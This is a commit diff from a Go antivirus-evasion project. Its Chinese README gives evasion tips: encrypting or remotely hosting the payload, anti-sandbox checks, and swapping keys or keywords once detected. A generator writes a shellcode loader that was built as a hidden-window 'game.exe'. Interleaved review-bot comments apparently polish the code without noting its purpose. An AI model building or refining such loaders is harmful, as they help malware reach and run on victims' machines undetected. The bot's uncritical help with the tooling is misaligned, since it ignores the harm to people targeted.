update
safe6Sec committed Aug 24, 2021
1 parent f4c7049 commit 1ca487e
Showing 2 changed files with 10 additions and 5 deletions.
10 changes: 8 additions & 2 deletions README.md
Expand Up @@ -8,7 +8,8 @@
## 免杀思路
### 静态
静态免杀比较简单,可选加密payload或者分离payload。
核心:把特征去除即可过静态,某些杀毒软件带沙箱,还需要考虑反沙箱。
核心:
把特征去除即可过静态,某些杀毒软件带沙箱,还需要考虑反沙箱。
除此之外还可以考虑如下方式:
由于要引入net包,导致文件大小比较大。我不做测试了。
把payload分离远程服务器
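Review bot: the new "除此之外还可以考虑如下方式:" line announces a list of further approaches, but the line that follows it, "由于要引入net包,导致文件大小比较大。我不做测试了。", is a remark about file size and untested status rather than a list item, so the reader cannot tell which approach it refers to. Consider moving that remark under the "把payload分离远程服务器" item it appears to describe, or marking the items explicitly, so the structure of the section is clear.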
Expand All @@ -28,7 +29,12 @@ golang和c++有点不一样不需要考虑处理IAT。


## 说明
test1、test2效果还可以。

2021.8.24
直接用gen里面代码进行生成,演示视频已经放公众号,目前免杀已达目的更新会放缓。
注意:建议每次使用之前手动改一下key,如果被杀改一下关键字即可。





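Review bot: the added "## 说明" section ends with five blank lines before the existing content, which is stray trailing whitespace; trim them to a single blank line. Separately, the "2021.8.24" note states that the code in gen is now used directly for generation, but does not mention that the build step was removed from gen/main.go in this same commit, so the README should say that the user now has to build the generated shellcode.go themselves.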
5 changes: 2 additions & 3 deletions gen/main.go
Expand Up @@ -5,7 +5,6 @@ import (
"fmt"
"io/ioutil"
"os"
"os/exec"
"strings"
)

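Review bot: dropping "os/exec" is required once the exec.Command call is commented out, but "os" is kept even though the only visible use, os.Remove("shellcode.go"), is also commented out in the later hunk; if "os" is not referenced elsewhere in main.go this will fail to compile with an unused-import error, so check whether it should be removed too.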
Expand Down Expand Up @@ -40,9 +39,9 @@ func main() {
code = strings.ReplaceAll(code, "${bdata}", bdata)

ioutil.WriteFile("shellcode.go", []byte(code), 0666)
cmd := exec.Command("go", "build", "shellcode.go", "-ldflags=\"-s -w -H=windowsgui\"", "-o", "game.exe", "shellcode.go")
//cmd := exec.Command("go", "build", "shellcode.go", "-ldflags=\"-s -w -H=windowsgui\"", "-o", "game.exe", "shellcode.go")
//cmd:=exec.Command("go","build shellcode.go -ldflags=\"-s -w -H=windowsgui\" -o main2.exe shellcode.go")
cmd.Run()
//cmd.Run()
//os.Remove("shellcode.go")

}
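Review bot: with cmd.Run() commented out, the ioutil.WriteFile call on the line above is now the program's only effect, yet its returned error is still discarded, so a failed write exits silently with status 0 and the user is left with no file and no message. Wrap it as `if err := ioutil.WriteFile("shellcode.go", []byte(code), 0666); err != nil { ... }` and report the failure. The commented-out exec.Command lines also pass "shellcode.go" twice and embed literal quotes inside the -ldflags argument, which go build would receive verbatim; if the build step is ever restored, those lines should not be used as-is.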
